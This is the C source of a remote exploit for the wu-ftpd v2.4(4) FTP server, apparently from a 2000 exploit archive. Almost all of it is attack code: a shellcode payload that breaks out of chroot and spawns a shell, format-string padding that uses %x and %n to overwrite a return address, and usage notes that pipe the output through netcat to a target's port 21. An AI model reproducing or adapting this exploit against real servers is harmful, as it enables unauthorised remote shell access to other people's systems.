/* * Sample example - part 2: wu-ftpd v2.4(4), exploitation. * * usage: * 1) find the right address location/eggshell location * this is easy with a little play around %s and hexdump. * Then, fix this exploit. * * 2) (echo "user ftp"; ./exploit; cat) | nc host 21 * * echo ^[c to clear your screen if needed. * * Don't forget 0xff must be escaped with 0xff. * * Pascal Bouchareine [ kalou ] */ main() { char b1[255]; char b2[255]; char b3[255]; char b4[255]; char xx[600]; int i; char egg[]= /* Lam3rZ chroot() code */ "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80" "\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; // ( (void (*)()) egg)(); memset(b1, 0, 255); memset(b2, 0, 255); memset(b3, 0, 255); memset(b4, 0, 255); memset(xx, 0, 513); for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */ strcpy(&xx[i], "%x"); } memset(b1, '\x90', 0xa3 - 0x50); memset(b2, '\x90', 0xfe - 0xa3 - 2); memset(b3, '\x90', 0xff - 0xfe); memset(b4, '\x90', 0x01bf - 0xff); // build ret address here. // i found 0xbffffea3 printf("pass %s@oonanism.com\n", egg); printf("site exec .." "\x64\xf9\xff\xff\xbf" // insert ret location there. "\x65\xf9\xff\xff\xbf" // i had 0xbffff964 "\x66\xf9\xff\xff\xbf" "\x67\xf9\xff\xff\xbf" "%s" "%s\xeb\x02%%n" "%s\xeb\x02%%n" "%s%%n" "%s%%n\n" , xx, b1, b2, b3, b4); } /* www.hack.co.za [19 July 2000]*/